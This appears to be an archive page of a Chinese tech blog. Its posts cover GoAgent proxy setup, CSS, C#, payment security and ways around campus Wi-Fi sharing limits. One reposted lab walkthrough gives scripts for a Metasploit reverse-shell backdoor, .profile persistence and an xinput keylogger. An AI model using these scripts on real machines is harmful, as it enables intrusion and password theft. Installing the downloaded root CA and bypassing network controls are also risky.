GoAgentForMacOS,苹果系统翻墙方法 翻墙技巧

1、Chrome设置使用GoAgent
  • 此方法整理自网上教程,流量所用appid为本项目自创,特此说明。
  • 本文中所说的goagnt指的就是GoAgent。
  • 往下看之前,请确定你的MAC系统上已经安装好了谷歌Chrome浏览器,然后用chrome看这篇教程。
  • 第一步:配置chrome浏览器

    1)安装SwitchySharp扩展。

    这个扩展在Chrome应用店的地址:https://chrome.google.com/webstore/detail/proxy-switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm

    如果你能在Chrome应用店里安装成功就可以直接看第2)小步,如果不能安装,那就下载这个扩展再安装。方法:

    点右边的链接去我网盘下载SwitchySharp扩展:http://pan.baidu.com/s/1eQIPyYe

    下载后,打开chrome的扩展程序页面,地址:chrome://extensions/

    把刚刚下载下来的SwitchySharp.crx文件拖拽到扩展程序页面,松开鼠标,弹出的安装提示点【添加】,如下图:


  • 111.png 

安装成功后会自动打开SwitchySharp 选项页面。

2)导入SwitchySharp的配置文件

先去我网盘将我设置好的配置文件(SwitchyOptions.bak)下载下来: http://pan.baidu.com/s/1gdGL5NP 

再点SwitchySharp 选项页上的【导入/导出】(如下图),接着点【从文件恢复】(如下图),会弹出定位窗口,定位到刚刚下载的SwitchyOptions.bak文件,点确定导入。

222.png

弹出确认导入的对话框,点【确定】,导入成功,再点【确定】,如下图:

333.png444.png

如果导入设置这一步提示“备份文件已损坏”,那就再试一次。

3)选择代理模式。

点一下chrome右上角的地球图标,下拉菜单有几种代理模式,点一下【自动切换模式】(如下图),建议在一般情况下使用这种模式,比较方便自定义。

555.png


下面简单说一下几种模式各自的作用:

  • 【直接连接】:就是不使用任何代理。
  • 【8087 全局代理】:选择此项,则访问的网站都使用goagnt代理,除部分谷歌域名。如果想在访问墙内网站时隐藏真实ip,可以选择这个。某个网站打不开也可以选择这个。缺点是访问墙内网站速度慢。
  • 【PAC 8086】:由goagnt文件夹内的pac文件来定义访问规则,大体上是墙内直连,墙外使用goagnt。
  • 【PAC 8086 白名单】:由goagnt文件夹内的另一个pac文件来定义访问规则, 这个pac文件内都是世界排名靠前的墙内网站,所以如果使用此项,那就是除了pac文件内的网站,其它网站都使用goagnt 代理。
  • 【自动切换模式】 :通过在SwitchySharp 选项里设置的规则来控制一个网站是否启用代理,规则内没有的域名是直接连接。这个比PAC模式自定义设置方便。

每一项必须选中后才会起作用,两种PAC模式自定义规则比较麻烦,所以还是建议使用【自动切换模式】。

第二步:下载 和 运行goagnt

1)下载goagnt

点这个链接去把我已经设置好的goagnt下载下来: http://pan.baidu.com/s/1esy1S

2)解压goagnt

下载后解压出来,解压的时候选择【解压到当前的文件夹】这样的操作,因为压缩包内已经包含goagnt这个文件夹,确保打开goagnt文件夹就能看见里面的十个文件,然后把goagnt文件夹拖拽到如下图位置,确认路径没有错误(下图左边的红箭头所指的地方写的名字是aa,这个在你那里可能是别的名字,只要认准是那个”小房子“的图标就行)。

666.png 



3)运行goagnt

打开终端,输入cd goagnt回车,然后再输入python proxy.py回车,如下图:

777.png



这一步完成后就可以用之前设置好的chrome浏览器上外网了。以后每次使用只需要执行此步即可。


需要注意:如果打开一些https链接出现<安全证书不受信任>的情况,只需要导入goagnt文件夹下的CA.crt证书就可以解决此问题。 导入证书方法请看另一篇:导入GoAgent证书方法






admin 发布于  2014-11-28 12:01 

TCP/IP并发连接数修改方法(XP系统) 技术文章

TCP/IP并发连接数修改方法(XP系统)


   


    使用GoGo搜ip速度很慢吗?请看下文。

    WindowsXP系统默认限制了TCP/IP并发连接数,默认是10,需要将这个修改成更大才能让一些软件的功能发挥到更好,比如GoGo这个通道检测器就是这样。

    我这里在网上搜到了一个小软件可以修改TCP/IP并发连接数,软件小巧,操作简单。

    软件名:TCPIP连接数补丁.exe

    下载地址(我网盘): http://pan.baidu.com/s/1bnElPnx


使用方法:

   下载压缩包后解压出来,双击运行解压出来的“TCPIP连接数补丁.exe”程序,打开如下图小窗口:

21.png

如上图,将数值改为 1024(不要大于1024),然后点“应用”,由于修改的是系统文件,所以系统会弹出文件保护警告,如下图:22.png

23.png


如上,按箭头所示操作,然后重启电脑就可以了。

除非以后重装系统,否则都不需要再修改了。




标签: 防火墙

admin 发布于  2014-11-28 10:39 

解决SSL错误 技术文章

如果你使用我分享的的谷歌浏览器遇到访问YouTube、Facebook、Twitter、Google等以https开头的网址时出现【SSL错误】,https那里有个斜杠,如下图:

112.png

或者提示【该网站的安全证书不受信任!】、或者页面排版混乱,这种情况都是GoAgent的证书没有成功导入造成的,需要自己手动导入一次证书。导入方法如下: 在Agent文件夹内有一个名为CA.crt的文件,如果你电脑隐藏了文件的扩展名,那么它的名字就是CA,它就是证书文件,如下图:

113.png

双击这个CA.crt文件,弹出的小窗口点【安装证书】,如下图:

114.png

弹出窗口点【下一步】,如下图:

115.png

下图中,点选【将所有证书放入下列存储区】,然后点【浏览】

116.png

弹出的小窗口内点选【受信任的根证书颁发机构】,然后【确定】,再点【下一步】,如下图:

117.png

接下来点【完成】,如下图:

118.png

在弹出的窗口点【是】。如下图〔如果没出现下图这个安全警告,说明系统已经存在此证书〕

119.png


提示导入成功,点【确定】,最后关闭那个证书窗口就可以了。

说明:如果相比火狐来说你更喜欢用谷歌浏览器,那么导入证书这个操作就是必须掌握的技术,整个过程比较简单,用不了一分钟。只需要导入一次,除非是重装了系统或者从证书管理器里删除了证书,否则不需要再次导入。

其实GoAgent软件本身具备自动导入证书的功能,在第一次启动软件的时候就执行自动导入证书到系统中,但是由于每个电脑内的环境不一样,个别安全类软件一干扰,就会造成证书不能成功导入,直接影响https开头的网站。

注: 火狐内置证书管理器,那个我已经导入了证书,所以火狐一般不会出现这个问题。除了火狐,其它浏览器都是使用系统的证书管理器,所以才会出现这样的问题,但也不是每台电脑都会出现。



admin 发布于  2014-11-28 10:01 

Metasploit渗透Ubuntu 12.04攻击测试演练(转) 渗透测试

这篇文章写来主要是一次娱乐性的练习。共享出攻击的细节,其中包括一些经过原作者修改过的各种来源的脚本文件。渗透的过程不是重点,之所以发出来最大的原因主要是文章后半部分维持持久化攻击的一些地方还是很值得学习的,顺便大家也可以再次熟悉一下MSF框架。希望对大家有所帮助。

攻击环境:

Ubuntu12.04LTS 32bit(靶机,默认的软件安装配置)
VirtualBox
Metasploit framework(最新版)
Debian Squeeze 64bit (攻击机)

首先,我们先准备一个简单的二进制ELF可执行文件生成器的bash脚本,这样后续工作就可以轻松很多。然后将脚本放在Metasploit的主目录下:

#!/bin/bash clear
echo"************************************************" echo " LINUX ELF BINARY GENERATOR FOR METASPLOIT    *" echo"************************************************" echo -"What IP are we gonna use  ex. 192.168.0.1?  \c" read IP
echo -"What Port Number are we gonnalisten to? : \c" read port ./msfpayloadlinux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port R| ./msfencode -t elf-e x86/shikata_ga_nai >> Executive echo "Executive binarygenerated.." chmod u=rwx Executive ls -la Executive

运行脚本之后进行简单的配置之后我们就有了一个名为Executive的二进制可执行文件。

接下来需要我们在攻击机上启动一个监听来等待靶机主动连上来,因为我们这里使用了全球流行的reverse后门哇咔咔!为了工作更加简(zhuang)单(bi),我这里又写了一个bash,然后将bash文件也放在Metasploit的主目录下面:

#!/bin/bash clear
echo"*********************************************" echo "   METASPLOIT LINUX METERPRETER LISTENER    *" echo"*********************************************" echo "Here is a network device listavailable on yor machine" cat /proc/net/dev | tr -s  ' ' | cut -' ' -f1,2 | sed -'1,2d' echo -"What network interface are wegonna use ?  \c" read interface
echo -"What Port Number are we gonnalisten to? : \c" read port # Get OS name OS=`uname` IO="" # store IP case $OS in   Linux) IP=`/sbin/ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print$1}'`;;    *)IP="Unknown";; esac echo "      starting the meterpreter listener.." ./msfcli exploit/multi/handler  PAYLOAD=linux/x86/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port  E

好了,监听生成结束,然后就需要我们使用各种猥琐的方式将后门木马转给Ubuntu靶机执行。因为这里是练习,所以我们直接将ELF文件放在受害机中执行                         此处有图胜有声

1 (1).jpg

现在我们就已经在靶机上成功执行了这个“未知”的二进制文件。当我们双击这个文件时没有任何反应(所以这个时候后门注入才是王道),不过我们的攻击机上的监听已经有了结果:

1 (2).jpg

然后呢?我们现在有了一个meterpreter shell,不过应该怎样获取到root权限呢?接下来的工作才是最有趣的部分:接下来,我们将在靶机的home中放一个后门文件,并通过修改.profile文件做到每次靶机启动的时候都会执行我们的后门。为了做到这步,我们首先需要下载靶机的.profile文件:

1 (3).jpg

我们在文件中加了一点点内容以保证每次登录都能成功执行我们的后门文件,这里加的是./executive(用的就是生成的后门文件名,这里我们可以起一些诱惑性大的名字比如sys.conf之类的,但是要保证文件具有可执行+x权限)

1 (4).jpg

然后我们将修改后的.profile文件传回靶机

1 (5).jpg

接着我们上传我们的ELF二进制可执行文件到靶机的home目录里面,并改名为executive同时要保证文件具有RWX属性

1 (6).jpg

1 (7).jpg

那么现在我们就获得了一个简单的持久性后门,每次靶机开机我们这边就可以获得一个上线shell,并且文件时静默执行不含任何防腐剂的。

好的,第一步持久化我们已经完成了,接下来我们做点什么呢?

键盘记录

Ubuntu自带xinput所以我们可以利用这个做一个键盘记录keylogger记录靶机在X界面下的一些按键输入。同时这里作者又写了一bash脚本(……):

#!/bin/bash export DISPLAY=:0.0 xinput list
echo -"KBD ID ?" read kbd
xmodmap -pke > /tmp/.xkey.log
script -"xinput test $kbd" |cat >> /tmp/.xkey.log & echo "The keylog can be downloadedfrom /tmp/.xkey.log" echo "Use the meterpreter downloadfunction" echo "Press CTLR+C to exit thissession, keylogger will run in backround"

写完之后我们将脚本放在靶机中然后执行。当然最好也来个登录启动。


1 (8).jpg

启动之后我们还需要手工找到键盘的KBD ID,然后输入,这里是10

1 (9).jpg


然后让脚本去识别一下。脚本记录的log文件默认是放在/tmp文件夹下的,一段时间之后,我们下载下来分析一下。

111.jpg


这个脚本的生成的内容地球人是看不懂的,所以我们将log文件down下来之后还需要进行接下来的处理,这里作者写了一个bash文件生成了一个python脚本来解码这段天书log(…),下面是解码的bash脚本:

#!/bin/sh cat .xkey.log | grep keycode >xmodmap.pke
cat .xkey.log | grep 'key p' > xlog
rm -.xkey.log #Generating some Python to do the decoding echo 'import re, collections, sys' >decoder.py
echo 'from subprocess import *' >>decoder.py
echo 'def keyMap():' >> decoder.py
echo '  table = open("xmodmap.pke")' >> decoder.py
echo '  key = []' >> decoder.py
echo '  for line in table:' >> decoder.py
echo "      m = re.match('keycoded+) = (.+)',line.decode())" >> decoder.py
echo '     if m and m.groups()[1]:' >> decoder.py
echo '        key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])'>> decoder.py
echo '  return key' >> decoder.py
echo 'def printV(letter):' >>decoder.py
echo '     key=keyMap();' >> decoder.py
echo '     for i in key:' >> decoder.py
echo '              if str(letter) ==i.split("_____")[1]:' >> decoder.py
echo '                     return i.split("_____")[0]'>> decoder.py
echo '     return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >>decoder.py
echo '        print "Usage: %s FILE" %sys.argv[0];' >> decoder.py
echo '        exit();' >> decoder.py
echo 'else:' >> decoder.py
echo '        f = open(sys.argv[1])' >>decoder.py
echo '        lines = f.readlines()' >>decoder.py
echo '        f.close()' >> decoder.py
echo '        for line in lines:' >> decoder.py
echo "                m = re.match('keyss +(\d+)',line)" >> decoder.py
echo '                if m:' >> decoder.py
echo '                          keycode =m.groups()[0]' >> decoder.py
echo '                          print(printV(keycode))' >> decoder.py
 
echo 'Please see LOG-keylogger for theoutput......' python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG >LOG-keylogger
rm -f LOG
rm -f xmodmap.pke
rm -f decoder.py
rm -f xlog
cat LOG-keylogger

现在我们运行一下这个bash脚本,我们就可以看到效果了:

1 (10).jpg



好,keylogger也搞完了接下来就是怎么样获取到root权限了。

获取root权限

在这里,我们从以上的keylogger中获取到了root密码,但是当我们直接输入sudo su获取root的时候却遇到了无法返回响应的情况:

112.jpg

这里有一个绕过的好方法,就是利用自带的python来获取一个交互式的shell从而可以让我们获取root权限

python -import pty;pty.spawn(‘/bin/bash’)”

这样我们sudo su的时候就可以输入root密码了,然后成功获取到了一个root级别的shell,整个过程就完满完成了。

113.jpg



后记

CentOS, Debian Squeeze等有些系统默认是不带xinput的所以keylogger的部分就没办法完成了。

另外,要想防止这个键盘记录其实也很简单,只要去掉xinput的可执行权限就可以了

chmod a-/path/to/xinput

当然,即便是目标机器上没有自带xinput那难道就会难倒我们么?拜托我们都已经有了meterpreter shell了好么。

最后附上作者做的良心的视频Demo(已搬回墙内,不谢!):

百度网盘下载/观看:

链接:  http://pan.baidu.com/s/1eQIkbQy    提取码:  m37p

有梯子的请点这里:http://www.youtube.com/embed/_k_DtYhIOpY


admin 发布于  2014-11-26 22:01 

研究人员在黑帽大会上演示USB的致命缺陷 业界新闻

mrxn.net----翻译分享----安全专家卡斯滕Nohl和Jakob Lell演示了如何重新编程和使用任何USB设备感染计算机用户不知情的情况下。

3.jpg

在的黑帽安全会议上发表讲话,并在随后英国广播公司(BBC)采访时,两人有了问题对未来的USB设备的安全。

作为演示的一部分,一个正常的智能手机连接一台笔记本电脑,也许一个朋友或同事可能会问你做的事情,这样他们就可以充电设备。但智能手机修改网卡和不是一个USB媒体设备。结果是,手机上的恶意软件能够从合法网站流量重定向到影子服务器,假的和真正的网站的外观和感觉,但实际上是设计只是为了偷登录凭证。

根据一项博客条目发布的这一对,USB的多才多艺也是它的弱点。“因为不同设备类可以插进连接器相同,一种类型的设备可以变成一个更有能力或恶意的类型没有用户注意,”研究人员写道。

那些对安全研究实验室工作的专家,在德国,在黑帽会议上了“BadUSB——把邪恶的配件。“每一个USB设备有一个微控制器,对用户不可见。它负责与主机设备(如个人电脑)和与实际的硬件。这些微控制器的固件是不同的在每一个USB设备,每个设备上的微控制器软件是不同的。网络摄像头、键盘、网络接口、智能手机和闪存所有执行不同的任务和相应的软件开发。

然而,团队管理的反向工程,不同设备的固件在不到两个月。因此他们可以re-program设备和让他们充当他们没有的东西。

在黑帽,一个标准的USB驱动器是插入到计算机。恶意代码植入棍骗电脑思考一个键盘被插入。假键盘开始键入命令,迫使计算机从互联网下载恶意软件。

防御这种类型的攻击包括微控制器固件更新的策略如代码签名或固件的禁用硬件的变化。然而,这些都必须实现的USB设备制造和不是最终用户可以执行。

你可以在这里下载幻灯片的演示:https://srlabs.de/blog/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf 

 


admin 发布于  2014-11-26 20:33 

吸烟不仅伤身,还伤电脑:攻击者利用电子香烟传播恶意软件 业界新闻

1.jpg

吸烟不仅伤身,还伤电脑……近日,一款中国制造的电子香烟被曝出其通过USB充电时,会自动在用户计算机上安装恶意软件。

公司高管计算机被黑

最近一名网友在Reddit社会新闻网站上发布了帖子,详细介绍了某大型公司高管的计算机是如何感染不明来源的恶意软件(恶意软件一般包括木马、病毒等)。而通过进一步的调查发现:恶意软件的来源居然是他在网上花了5美元买来的电子香烟!

值得一提的是,这位高管的电脑并不是“裸奔”:系统不仅已经安装了补丁更新,而且还安装了杀毒软件和反恶意程序软件。最初IT技术人员用尽了各种传统方法都没有找出感染恶意软件的源头,于是IT技术人员开始尝试从其他的方面进行调查:

IT人员:你最近在生活上有没有发现什么可疑之处?
高管:没啥,不过我最近在戒烟,从网上买了一根电子烟代替真正的香烟。

凶手就是电子香烟

经调查发现,恶意软件代码被写入了电子香烟的充电器里。当把电子烟插入电脑USB接口充电时,恶意软件会通过网络自动与指令与控制服务器(C&C)通讯,然后感染用户计算机。

ID管理公司Bit4Id的信息安全主管Pierluigi Paganini说,电子烟是传播恶意软件的最新载体。

猥琐又奇葩的攻击方式

攻击者可以利用任何可以利用的设备感染处于低防护的网络。尽管这种攻击看起来猥琐又奇葩,但不可否认的是,确实有很多的电子香烟都是通过USB进行充电的(有的使用特殊的连接线,有的直接插入USB接口),这给了攻击者可乘之机。

2.jpg


虽然我们现在没有足够的证据来证明这一消息的可信度,但是我们认为这种攻击还是有可能的。类似用USB设备传播恶意软件的例子在过去就发生过,比如有的攻击者会用电池充电器感染笔记本电脑和移动设备,还有刚刚发生不久的Badusb事件

据英国卫报建议:要想规避这种风险,最好买可信赖厂商的USB充电设备,如Aspire,KangerTech和Innokin,不要购买中国的电子设备(又黑我大天朝!)




admin 发布于  2014-11-26 20:27 

子元素浮动父容器高度不能自适应的CSS解决方法 代码人生

网页前端工作者经常会遇到子元素设置float浮动后导致父容器高度不能自适应,也就是俗称的外部容器不能被“撑大”,常见表现为背景或边框异常,这时我们就需要来清除“闭合浮动”,方法主要有以下4种:

1.  额外标签法

这种方法就是向父容器的末尾再插入一个额外的标签,并令其清除浮动(clear)以撑大父容器。这种方法浏览器兼容性好,没有什么问题,缺点就是需要额外的(而且通常是无语义的)标签。

虽然许多人不喜欢这种方法,但是它却是W3C推荐的方法。

<div style="clear:both;"></div>

或者使用

<br style="clear:both;" />

2. 使用after伪类

这种方法就是对父容器使用after伪类和内容声明在指定的现在内容末尾添加新的内容。经常的做法就是添加一个“点”,因为它比较小不太引人注意。然后我们再利用它来清除浮动(闭合浮动元素),并隐藏这个内容。

这种方法兼容性一般,但经过各种 hack 也可以应付不同浏览器了,同时又可以保证html比较干净,所以用得还是比较多的。

以下为一个采用伪类的CSS示范写法:

#box:after{  
     content:".";  
     height:0;  
     visibility:hidden;  
     display:block;  
     clear:both;  
}

3. 设置overflow为hidden或者auto

这种做法就是将父容器的overflow设为hidden或auot就可以在标准兼容浏览器中闭合浮动元素.

不过使用overflow的时候,可能会对页面表现带来影响,而且这种影响是不确定的,你最好是能在多个浏览器上测试你的页面。如无特殊情况,一般推荐使用hidden属性。

4. 浮动外部元素,float-in-float

这种做法就是让父容器也浮动,这利用到了浮动元素的一个特性——浮动元素会闭合浮动元素。这种方式在 IE/Win 和标准兼容浏览器中都有较好的效果,但缺点也很明显——父容器未必想浮动就浮动的了,毕竟浮动是一种比较特殊的行为,有时布局不允许其浮动也很正常。

标签: 代码 html

admin 发布于  2014-11-26 13:06 

用C#解决100钱买100鸡的数学题 技术文章

我们老师今天给我们布置了一个小作业,就是百钱买百鸡,具体的题目是这样的:

100元钱 要求买100只鸡 
其中,
公鸡 5/只
母鸡 3/只
小鸡 1元*3只

求有几种组合?


明显题目中有三个未知数,用方程求解貌似不可能,因为答案肯定不为唯一.


好吧,我就用C#来做吧,开始,我们得定义三个变量吧,  a-公鸡  ,b-母鸡 , c-小鸡 ,

条件就是:a+b+c=100(只)  而且还得同时满足 : 5*a+3*b+c/3=100(元)

那么,很明显,我们可以用 if语句 来搞定它! 打开我们的visual studio 2013 ,新建项目,下面是代码,我先贴下完整的代码,后面说一些注意的事项.

---------------------------------------------------------------------------------------------------------------------

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace 百钱买百鸡
{
    class Program
    {
        static void Main(string[] args)
        {
            for (int a = 1; a <= 100; a++)  //这里我们定义变量a为公鸡
                for (int b = 0; b <= 100; b++)  //定义变量b为母鸡
                    for (int c = 0; c <= 100; c++)  //定义变量c为小鸡
                        if ((a + b + c) == 100 && (a * 5 + b * 3 + c / 3) == 100&&c%3==0)  //这里是重点,我们用if循环来控制条件,如果达到条件就运行,否者就不运行.
                            Console.WriteLine("满足条件的有:{0},{1},{2},", a, b, c);  //输出我们的三个变量的结果
                        {
                        }
                    {
                    }
                {
                }
            {
            }
        }
    }
}

然后 ctrl + F5 调试运行,OK,效果如下:

2014-09-18-07000016.png

一共有三组,这是从100*100*100中结果中筛选出来的满足条件的,如果人工筛选,那工作量就太大了!但是程序却一闪而过就出来的,所以我们编程得有一种思想,让程序去解决问题,我们只需发布命令就行!

好了,下面说一下需要注意的地方:我们这编程的时候如果使用的是搜狗输入法,最好做如图所示的操作,

2014-09-18-07000014.png

这样就可以大大的避免在编辑代码的时候输入中文符号,并因此而出现调试程序出现错误.

在我用 if语句 定义条件的时候,出现了这样一幕:

2014-09-18-08000018.png

满足条件的有:3,20,77,
满足条件的有:4,18,78,
满足条件的有:7,13,80,
满足条件的有:8,11,81,
满足条件的有:11,6,83,
满足条件的有:12,4,84,
请按任意键继续. . .
很明显,这其中的组合又不满足的,因为小鸡的个数不可能是小数啊! 这是在最开始的时候没有想到的.......

我们在看出现这个问题的代码吧:

if ((a + b + c) == 100 && (a * 5 + b * 3 + c / 3) == 100)  可以看出,我们没有定义小鸡能被3整除.加&&c%3==0

最后变成: if ((a + b + c) == 100 && (a * 5 + b * 3 + c / 3) == 100&&c%3==0)   就完美解决了!

 

标签: 编程 C#

admin 发布于  2014-9-18 06:42 

警惕互联网支付——Apple Pay也不例外 业界新闻


0.jpg

 

最近几年,互联网支付出现在我们身边。从嘀嘀打车、快的打车,到二维码支付,银行快捷支付。如今,苹果高调发布Apple Pay,传言银联正在接洽,大有普及之势。但是,作为消费者,我们还是应该有所警惕,看上很美的东西背后往往暗藏风险。


一、Apple Pay的指纹验证是否万无一失


从Apple Pay的验证方式来看,NFC加上指纹识别验证,看似完美无缺。但是我们要警惕的是,指纹也好,密码也好,人脸识别也好,归根结底是一组数据。


指纹信息同样是作为一组数据。虽然苹果对指纹信息做了严格的加密措施,采用了Secure Enclave进行保护,但是Secure Enclave也难保万无一失。虽然Secure Enclave可以设立安全区域,但是其中的数据并没有物理隔离(安全区域存储断电),而指纹识别的传感器所产生的数据在储存到安全区域前能否被截获也是问题,如果这种数据因为iTune或者网络支付等原因被上传到网络服务器则更加危险。所以只要是数据,就有被截获、复制、利用的可能。不能保证绝对安全。


对于传统的银行卡来说,本身是一个非智能的东西,没有谁能让银行卡运行程序。安全验证是通过银行的网络、移动通讯网络进行的,而读卡设备也是封闭的。第三方想在读卡设备上安装个木马是比较麻烦的。


手机则完全不同,手机是可以运行程序的。第三方木马如果进入手机,不仅仅可以截获你的密码,也可能截获你的指纹数据。而指纹数据,苹果的id,信用卡数据你都存储在手机里面,这就是太危险了。相当于姓名、账号、密码信息全部透明,黑客只要破解了你的手机,一切都没有了。


二、苹果本身的安全问题


棱镜门过去不久,国母的手机从苹果换成了Nubia。对于苹果公司来说,美国政府或者强力部门的调查都是不可抗拒的。


如果现在苹果的服务器被攻破,不过是泄露点艳照,如果Apple Pay流行以后,苹果的服务器再被攻破,那么全球苹果用户的金融安全将遭受到巨大威胁。对中国来说,让苹果Apply Pay流行,就意味着国家的金融安全交到了一家美国商业公司的黑箱,风险很大。


金融企业,一般内外网是物理断开的。除了网银等一些特意留出的通道,外网是无法通过互联网访问到银行核心数据的。而苹果公司的安全性是否达到了金融级别的要求?这很让人担心。


目前,大陆流行的移动支付本身就不是很安全,尤其是涉及到银行卡的快捷支付功能,经常出现用户被骗,银行卡被转空的案例。苹果Apply Pay普及后则更加让人担心。


三、移动支付方便,但要小心使用


不可否认,移动支付给我们带来了很多方便,但是给用户方便也就是给黑客方便。对于消费者而言,多一分警惕看好自己的钱包还是必要的。对于金额较大的银行卡,不要开通网上银行,更不要开通快捷支付,如果Apple Pay流行,也尽量不要关联。还是真人去银行柜台最安全。移支付的便捷,我们可以用专用的账户,不要放太多钱,即使被黑客破解无非损失个零钱。


移动支付,小心才能驶得万年船。




admin 发布于  2014-9-15 11:44 

对于2014最新版联通校园宽带认证的破解学习笔记---开启wifi 无连接限制的四种方法 技术文章

注:最近有很多童鞋反应学校的联通拨号认证太不人道,所以我抱着学习试一试的心态,

做了一下测试,只做学习研究参考,不承担相应后果,如果你继续往下看,

就表明你默认同意自愿承担所有责任,与本博客无关。

第一种方法:手动修改深澜客户端名称支持深澜客户端校园网

PS:要是Srun3000这个名字不行, 就改成Srun3K;反之一样的道理!

 另外,博主实验的是猎豹wifi 哟,其他的开wifi的软件应该也能用吧!

最新版猎豹wifi下载:猎豹wifi5.0不用找了!

       1、首先打开任务管理器;

1.jpg

2、再找到深澜的进程;发现深澜客户端的进程名是Srun3000    (1).exe,跟正常的Srun3000.exe进程名不一样

2.jpg

3、然后再到深澜的安装目录下面,找到对应的文件,如下图:

3.jpg

4、再选中那个文件,右键重命名把它改回Srun3000.exe这个名字,即可!

4.jpg

 5、最后再登录你的深澜,然后再开启猎豹免费WIFI即可!

PS:这里再提多一种情况:使用深澜客户端,猎豹WIFI会自动、闪退或者重启

出现上面的主要原因还是深澜客户端的名字被修改导致的,请按上面的手动解决办法尝试下,

       
这里再提下深澜客户端的文件名
       
旧版本:srun3000.exe
       
新版本:srun3k.exe

第二种方法:补丁支持深澜校园网

   1、先下载支持补丁

   补丁下载:补丁下载

    2、然后再把它解出来,放到深澜的客户端目录下面
    3、然后再运行支持补丁即可,最后一步当然是运行你的猎豹免费WIFI啦!


5.jpg


第三种方法:利用沙盘支持深澜校园网客户端

       1、先下载沙盘: 沙盘下载(只能是在32位上运行 64位的是无效的!)

       2、从沙盘里面运行你的深澜客户端(如下图)

       3、登录后,再开启你的猎豹免费WIFI即可!

6.jpg


第四种方法:简单方法动手支持深澜校园网客户端

       1、先开启深澜客户端联网
       2
、接下来右键打开任务管理器,找到深澜的进程结束掉。下面再继续开启你的猎豹免费WIFI即可!

7.jpg


   3、登录客户端联网,开启你的猎豹免费WIFI即可。

再次更新:打开客服端,输入账号密码 登陆后直接重启 之后再开猎豹wifi 就完美解决,不过方法不怎么好,嘿嘿 但是对于新旧版本都能搞定!

猎豹自动退退出解决方法:使用深澜客户端,猎豹wifi自动重启

确保您使用的猎豹wifi是最新版版本,下载地址:
http://wifi.liebao.cn 

深澜客户端文件名
旧版本:srun3000.exe
新版本:srun3k.exe

需要确保exe的文件名正确,如果文件名不正确,请按以下步骤操作:
1、退出猎豹wifi,退出深澜客户端
2、到深澜客户端文件目录下,找到文件-右键-重命名
3、名称修改成srun3000.exe,运行srun3000.exe,再运行猎豹wifi,查看猎豹wifi会不会自动重启
(如果不会自动重启,就完成了,如果会自动重启,退出猎豹wifi看第四步)
4、再把文件名修改成srun3k.exe,运行srun3k.exe,再运行猎豹wifi,查看猎豹wifi会不会自动重启

这里主要强调的是深澜的客户端文件名要正确,不能任意修改。

文章长期更新,欢迎评论或者留言反馈情况,我会尽量解决!

欢迎大家转载,相互学习,记得带上我的博客地址;https://mrxn.net  谢谢!严重鄙视复制别人的去装逼!





标签: wifi

admin 发布于  2014-8-27 16:57